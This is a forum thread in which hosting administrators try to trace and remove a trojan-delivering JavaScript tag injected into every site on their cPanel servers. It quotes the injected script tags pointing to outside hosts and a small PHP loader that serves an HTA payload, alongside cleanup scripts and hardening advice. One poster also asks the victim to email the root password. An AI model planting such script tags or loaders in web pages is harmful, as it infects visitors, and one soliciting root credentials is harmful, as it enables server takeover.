Virus TROJAN.DROPPER, need help!

[elenlace]

Hello,

We have CPanel and the wholy server has been infected with a virus called BLOODHOUND.EXPLOIT and/or TROJAN.DROPPER, VBS/INOR, etc, , I have CPanel's open_base dir security enabled so I have no idea how it has been spread to all the sites.

The code that is "inserted" into webpages varies, but it is usually:

<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>

We need help as well, we are willing to pay an expert to clean our server and give us the "recipe" to solve similar issues in the future.

Regards,

elenlace

PS: We have already restored the server and bringing the sites from backups restarted the virus spread.

 

[WebKingPin]

Not sure those are your problem

Hi,

I have research both of the viruses you claim have infected your system.
I take it you are running a UNIX box correct?
If so both varients do not affect UNIX.
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

Are your running OS commerce on any of your sites? If so you may want to check the directories. We noticed a security hole in the latest release which allows someone to add
files to the cart system. I am not sure exactly how they did this but I remove 2 zip files containing trojans deeply nested within folders with ramdon names in the OS comm dir.

Hope this helps,

WKP

 

[WebKingPin]

aww yes

Thinking....

After further review of the symatec site. I would say that it is definately something on your local machine. The virus is defined as a Internet Explorer vulnerablility. Sounds to me you need to update from MS website and run a virus scan on your PC.

I could be wrong but this is what I think your problem is.


later,
WKP

 

[AbeFroman]

Please email me at [email protected], I am an expert and can help.

 

[AbeFroman]

This script will fix it:
cd /home
files=`grep -r deckewwwr2 * -l | grep -v convert`
files2=$files
for ii in $files2; do
echo "Processing $ii"
cp -p $ii $ii.bak
cat $ii.bak | sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>
||g' > $ii
rm $ii.bak
done

What kernel are you using? (uname -r)

 

[elenlace]

Hi Abe,

I'm using 2.4.21-15.0.4.ELsmp.

I do have an idea how this happenned. A local user (someone that purchased an account, later to be found to be a malicious user) put 3 files on his hosting.

data.hta
spl.php
index.htm

spl.php was a php script "compiling" the information on the data.hta.

From there, it spread like a desease. Every account is getting it, and I can't find anything wrong with the server. Of course, it has been days since the malicious user account was cancelled and he has no access to the server. I have limited SSH to only my IP and ran rkhunter to check for rootkits. I have even ran the evaluation version of mcafee for linux and nothing wrong as well. It only initially detected the virus as VBS/Inor on the backup of the malicious user account.

I have even restored the server last sunday night, brought the sites up using the Cpanel backup, and the virus showed up AGAIN.

It calls several websites, mainly asbestos-ccl.com. I can put the complete list if it helps.

The virus it trieds to spread are a variety of Bloodhound, Generic Trojan, Javascript virus, etc.

Is important to mention we are very security-aware:

TMP noexec nosuid
APF firewall blocking most ports INGRESS OUTGRESS
MailScanner+CLAMAV for exim (I'm aware has probably nothing to do with this exploit)
RKHunter ran daily (0 rootkits so far)
SSH limited to our ISP's IP Block
No SSH for customers (of course blocked by the previous statement)
Always latest, secure kernel
Latest stable version of CPanel
Latest version of Apache
PHP 4.3.8

WHAT ELSE DO WE NEED?

I hope this thread helps anyone having this very annoying problem in the future. We will find a solution and once I find it I will post it here.

Regards,

elenlace

 

[elenlace]

Further information on this issue:

The PHP file contained:

<?
header("content-type: application/hta");
$szFile="data.hta";
$hFile=fopen($szFile, "r");
$szHTML=fread($hFile,filesize($szFile));
fclose($hFile);
echo($szHTML);
?>

The .hta was a bunch of code, probably binary content "compiled" by the previous code.

 

[AbeFroman]

Upgrade your kernel ASAP!


Did this script work?
cd /home
files=`grep -r deckewwwr2 * -l | grep -v convert`
files2=$files
for ii in $files2; do
echo "Processing $ii"
cp -p $ii $ii.bak
cat $ii.bak | sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>
||g' > $ii
rm $ii.bak
done

 

[AbeFroman]

Create file called
fixpages
put my script in fixpages
chmod 700 fixpages
./fixpages

 

[AbeFroman]

EMail me your root password if you want me to take a look

Do you have physical access to this server?

 

[tinboye22]

Bloodhound Exploit 54 - NEW!!

My sever was infected by this virus through a backdoor in a file that was installed by cpanel
Once i found out about it, my it people were quick to rectify but i wanted to share this with others that may have this issue

enable_dl function in php is to blame, all you need to do is turn it off and remove the trojans, then your server will function fine. Be aware some scripts require this file to function. But as soon as you enable it your server will be exploited again.

thanks

Justin

 

[chirpy]

Just to clarify - your server would not have been infected by this. The server would have been compromised through a vulnerable php script and then that dynamic module installed. It is that module which redirects sites that infects windows PC's with that virus. So, this is a server compromise due to insecure scripts, not a virus infection which implies something different:

http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.54.html

Either way, disabling enable_dl is always a good idea.

 

[hostit1]

How do you find root cause

Hello,

We have a terible trojan that gets loaded into memory. How do we find out where the trojan is spawning its exploit into memory.

What should I look for. I believe it is somewhere in the home directory.

Any ideas?

Kernel of the infected machine(s) 2.6.9-11.ELsmp & 2.6.9-22.0.1.ELsmp
I have updated the kernel today to 2.6.9-34.0.1.ELsmp on both machines as well as performed a /scripts/upcp

Should that fix the problem? I would love to find out where this trojan is "hiding" at so I can clean it up.

We have mod_security and mod_evasive installed as well as apf

Also, I ran the latest version of rkhunter and chkrootkit and they both found nothing.

Tim Rice
Host It Now Networks

 

[chirpy]

Well, you've posted to an old thread which probably is irrelevant to your problem which is always the dnager when digging them up like this rather than simply starting a new thread which would be more appropriate.

You need to explain more about why you think you have a trojan in memory and how it is manifesting. There are very very few real tojans or viruses for linux. The most likely exploit these days that loads into memory is if you have allowed dynamic libraries in php.ini in which case you should disable it:

enable_dl = Off

Then restart httpd.

 

[hostit1]

Sorry John if I posted in the wrong area. It seems like the post was very similar to the behavior that I am seeing.

I do have enable_dl turned off in the php.ini. I see very little usefuless in enabling this.
Many clients complain that there will be coding added to their pages such as a javascript source for a non-existant file

Others state that their anti-virus software detects a trojan when visiting certian sites.

I have moved some of the larger clients who have complained about this to their own dedicated cpanel server.
If I restart the server, things are great for awhile, then the complains start coming back in.


BTW, we enjoyed the cpanel training in Houston.

Tim

 

[kashif]

Javascript for trojan auto inserted in all websites

Well, you've posted to an old thread which probably is irrelevant to your problem which is always the dnager when digging them up like this rather than simply starting a new thread which would be more appropriate.

You need to explain more about why you think you have a trojan in memory and how it is manifesting. There are very very few real tojans or viruses for linux. The most likely exploit these days that loads into memory is if you have allowed dynamic libraries in php.ini in which case you should disable it:

enable_dl = Off

Then restart httpd.

Hi Chirpy,

Sorry if I have not posted this in correct thread. Actually I have very serious issue that all my websites of server are getting the javascript code for trojan automatically inserted in pages. e.g.

<script language='JavaScript' type='text/javascript' src='ghfdl.js'></script>

And then I will get message on windows PC with NOD 32 of trojan being download from that server. I have tried to find from where it is loading but couldn't. Can you kindly tell me how can I find this from where it is loading on all websites. And also one more issue that I can't create directories or files with names only having numerics e.g. mkdir 123456 will give me this error:

mkdir: cannot create directory `123456': No such file or directory

even that directory doesn't exist on whole server. Can you kindly provide any guidelines in this regards. Especially that trojan javascript issue. I have already disabled enable_dl in php.ini.

Thankyou,

Best Regards,

 

[kashif]

Anyone can help me in this regards. How can I disable that javascript being added in every website. Even no rootkit found on server...

 

[AndyReed]

How can I disable that javascript being added in every website. Even no rootkit found on server

This is one of the most recent Linux exploits. Try the following: run ClamAV and F-Prot. Also, run chkrootkit and rkhunter. If none of these helped, you can seek help from your host, or seek professional help. Good luck!

 

[kashif]

Hi Andy,
But how can I detect that from where that javascript is being added in all websites... Do tell me so that I can fix this asap....

Thanks....

 

[danbriant]

Hi Chirpy,

Sorry if I have not posted this in correct thread. Actually I have very serious issue that all my websites of server are getting the javascript code for trojan automatically inserted in pages. e.g.

<script language='JavaScript' type='text/javascript' src='ghfdl.js'></script>

And then I will get message on windows PC with NOD 32 of trojan being download from that server. I have tried to find from where it is loading but couldn't. Can you kindly tell me how can I find this from where it is loading on all websites. And also one more issue that I can't create directories or files with names only having numerics e.g. mkdir 123456 will give me this error:

mkdir: cannot create directory `123456': No such file or directory

even that directory doesn't exist on whole server. Can you kindly provide any guidelines in this regards. Especially that trojan javascript issue. I have already disabled enable_dl in php.ini.

Thankyou,

Best Regards,

I am having the exact same issue as well except my js call is like this
<script language='JavaScript' type='text/javascript' src='avabf.js'></script>
, ran a rkhunter and found nothing, about to runa clamav scan